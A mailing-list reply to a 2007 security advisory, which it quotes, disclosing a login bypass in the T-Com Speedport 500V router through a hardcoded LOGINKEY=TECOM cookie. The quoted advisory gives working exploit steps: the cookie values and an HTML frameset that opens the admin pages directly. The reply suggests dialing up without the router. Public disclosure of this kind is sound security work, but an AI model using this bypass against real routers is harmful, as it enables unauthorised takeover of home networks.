Re: Virginity Security Advisory 2007-001 : T-Com Speedport 500V Login bypass

["security () yospot de" <security () yospot de>]

Since this is not the first security problem on this router, and 
Deutsche Telekom really does not care,
I advice everyone to use alternative means of routing / dialing up. The 
modem shipped in conjunction with
this router requires VLAN support. Dialup requests will only be served 
on VLAN.7

More information can be found on man-wiki, althought it deals with the 
700V, which has the same security problems, it also applies to the 500V 
version.
<a 
href="http://man-wiki.net/index.php/T-Home_IPTV_without_speedport_W_700V";>man-wiki</a> 
and
<a 
href="http://man-wiki.net/index.php/T-Home_IPTV_over_wireless_bridge";>man-wiki</a> 


On Linux a "vconfig add eth0 7" will allow you to dial up without the 
Speedport 500V

Regards,
<a href="http://www.mohammadkhani.eu/";>Amir Mohammadkhani</a>



advisory07 () smtp ru schrieb:
> - - - --------------------------------------------------------------------
> Virginity Security Advisory 2007-001
> - - - --------------------------------------------------------------------
>              DATE : 2007-01-19 15:32 GMT
>              TYPE : remote
> VERSIONS AFFECTED : T-Com Speedport 500V Firmware 1.31
>            AUTHOR : Virginity
>   ADVISORY NUMBER : 005
> - - - --------------------------------------------------------------------
>
>
> Description:
>
> The Speedport 500V is a broadband-router which is sold in germany along
> with ADSL lines. (just so you know)
>
> The system is stupid and verifies wether you have entered the correct
> password by setting a cookie with the content LOGINKEY=TECOM
> (this is hardcoded and can not be changed)
> If an attacker simply creates this cookie he can bypass password 
> authentication by simply calling the configuration html sites directly.
>
> The attacker then has nearly full system access (you cannot change the
> system password without knowing the old one) and can change system
> configuration e.g. disable the firewall. You can also perform a firmware
> upgrade, which allows you to reset the password to the default one, which
> now gives you full system access.
>
> Vendor has not been notified. I don't think they care^^.
>
> - - - --------------------------------------------------------------------
>
>
> Example:
>
> Create a cookie like this:
>
> Name: LOGINKEY
> Content: TECOM
> Host: <ipaddress> <- replace this by your routers ipaddress ;)
> Path: /
> Expires: Never
>
> create a html page like this and open it in your browser:
>
> <html>
> <frameset rows="44,*" border=0 frameborder=0 framespacing=0">
> <frame src="http://<ipaddress>/b_banner.htm" name="banner">  
> <frameset cols="170,*" border=0 frameborder=0 framespacing=0>
> <frame src="http://<ipaddress>/m_startseite.htm" name="menu">
> <frame src="http://<ipaddress>/hcti_startseite.htm" name="hcti">  
> </frameset>
> </frameset>
> </html>
>
> this will bypass the login screen and lead you directly to configuration 
> menu.
>
> - - - --------------------------------------------------------------------
>
>
> Workaround:
>
> Download the Sourcecode from the vendor (GPL), replace TECOM with something
> else, try bulding it, and then try installing it on the hardware.
> i did not try this. its stupid and does not really solve the problem.
>
> - - - --------------------------------------------------------------------
>
>
> Personal note:
>
> Still here... sadly not dead yet. maybe i should hack the NSA so they kill
> me? *lol* guess i'd have to learn some real things.... greetz to s.
> and that other admin.
>
> - - - --------------------------------------------------------------------
>